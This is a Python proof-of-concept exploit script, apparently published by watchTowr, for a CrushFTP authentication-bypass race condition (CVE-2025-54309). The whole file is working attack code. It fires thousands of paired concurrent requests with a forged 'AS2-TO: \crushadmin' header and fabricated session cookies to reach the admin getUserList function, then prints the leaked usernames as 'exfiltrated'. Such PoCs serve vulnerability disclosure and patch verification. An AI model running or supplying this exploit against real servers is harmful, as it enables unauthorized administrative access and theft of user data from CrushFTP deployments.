#!/usr/bin/env python3 import requests import threading import time from concurrent.futures import ThreadPoolExecutor, as_completed import sys import random import string banner = """ __ ___ ___________ __ _ ______ _/ |__ ____ | |_\\__ ____\\____ _ ________ \\ \\/ \\/ \\__ \\ ___/ ___\\| | \\| | / _ \\ \\/ \\/ \\_ __ \\ \\ / / __ \\| | \\ \\___| Y | |( <_> \\ / | | \\/ \\/\\_/ (____ |__| \\___ |___|__|__ | \\__ / \\/\\_/ |__| \\/ \\/ \\/ watchTowr-vs-CrushFTP-CVE-2025-54309.py (*) CrushFTP Authentication Bypass Race Condition PoC - Sonny , watchTowr (sonny@watchTowr.com) CVEs: [CVE-2025-54309] """ helptext = """ Example Usage: - python watchTowr-vs-CrushFTP-CVE-2025-54309.py http://localhost:8082 """ # Generate random 4-character c2f value def generate_random_c2f(): return ''.join(random.choices(string.ascii_letters + string.digits, k=4)) # Global variables for c2f and cookie management C2F_VALUE = None CRUSH_AUTH_COOKIE = None def update_c2f_and_cookies(): """Generate new c2f value and update cookies""" global C2F_VALUE, CRUSH_AUTH_COOKIE C2F_VALUE = generate_random_c2f() CRUSH_AUTH_COOKIE = f"CrushAuth=1755657772315_Nr7FSH4jd2l6RueteEaaEDpY1CcdU{C2F_VALUE}; currentAuth={C2F_VALUE}" print(f"[*] Generated new c2f value: {C2F_VALUE}") # Initialize first c2f value update_c2f_and_cookies() def make_request_with_as2(target_url): """Make request with AS2-TO header and disposition-notification content type""" url = f"{target_url}/WebInterface/function/" headers = { "Host": target_url.replace("http://", "").replace("https://", ""), "User-Agent": "python-requests/2.32.3", "Accept-Encoding": "gzip, deflate", "Accept": "*/*", "Connection": "keep-alive", "AS2-TO": "\crushadmin", "Content-Type": "disposition-notification", "X-Requested-With": "XMLHttpRequest", "Cookie": CRUSH_AUTH_COOKIE } data = { "command": "getUserList", "serverGroup":"MainUsers", "c2f": C2F_VALUE } try: response = requests.post(url, headers=headers, data=data, verify=False, timeout=5) return f"AS2 Request - Status: {response.status_code}", response.text except Exception as e: return f"AS2 Request - Error: {str(e)}", "" def make_request_without_as2(target_url): """Make request without AS2-TO header and disposition-notification content type""" url = f"{target_url}/WebInterface/function/" headers = { "Host": target_url.replace("http://", "").replace("https://", ""), "User-Agent": "python-requests/2.32.3", "Accept-Encoding": "gzip, deflate", "Accept": "*/*", "Connection": "keep-alive", "X-Requested-With": "XMLHttpRequest", "Cookie": CRUSH_AUTH_COOKIE } data = { "command": "getUserList", "serverGroup":"MainUsers", "c2f": C2F_VALUE } try: response = requests.post(url, headers=headers, data=data, verify=False, timeout=5) return f"Regular Request - Status: {response.status_code}", response.text except Exception as e: return f"Regular Request - Error: {str(e)}", "" def check_vulnerable_response(response_text): """Check if response contains user_list_subitem pattern and extract usernames""" if "" in response_text: # Extract all usernames from user_list_subitem tags import re usernames = re.findall(r'(.*?)', response_text) if usernames: # Limit to top 10 users top_users = usernames[:10] print(f"[*] EXFILTRATED {len(top_users)} USERS: {', '.join(top_users)}") return True return False def race_requests_with_detection(target_url, num_requests=1000): """Race multiple requests and detect vulnerability""" print(f"Starting race with {num_requests} request pairs...") print("=" * 60) for i in range(num_requests): # Generate new c2f every 100 requests if i % 50 == 0: update_c2f_and_cookies() print(f"[*] NEW SESSION: c2f={C2F_VALUE}") # Store results results = {'as2': None, 'regular': None} def as2_worker(): results['as2'] = make_request_with_as2(target_url) def regular_worker(): results['regular'] = make_request_without_as2(target_url) # Create and start threads t1 = threading.Thread(target=as2_worker) t2 = threading.Thread(target=regular_worker) # Start both threads simultaneously t1.start() t2.start() # Wait for both to complete t1.join() t2.join() # Check for vulnerability in both responses as2_status, as2_response = results['as2'] regular_status, regular_response = results['regular'] # Check if either response contains the user list pattern if check_vulnerable_response(as2_response) or check_vulnerable_response(regular_response): print("[*] VULNERABLE! RACE CONDITION POSSIBLE!") return True # Print progress every 100 requests if (i + 1) % 50 == 0: print(f"[*] PROGRESS: {i + 1}/{num_requests} request pairs completed...") return False def poc_attempt(target_url): """Main POC function with retry logic""" total_requests = 5000 print("[*] CRUSHFTP RACE CONDITION POC") print(f"[*] TARGET: {target_url}") print("[*] ENDPOINT: CrushFTP WebInterface getUserList") print(f"[*] ATTACK: {total_requests} requests with new c2f every 50 requests") print("=" * 60) # Try 5000 requests with new c2f every 50 if race_requests_with_detection(target_url, total_requests): return True print("[*] POC FAILED: Target appears to be patched or timing window missed") return False if __name__ == "__main__": print(banner) if len(sys.argv) != 2: print(helptext) sys.exit(1) target_url = sys.argv[1] # Validate URL format if not target_url.startswith(('http://', 'https://')): print("[*] Error: URL must start with http:// or https://") sys.exit(1) poc_attempt(target_url)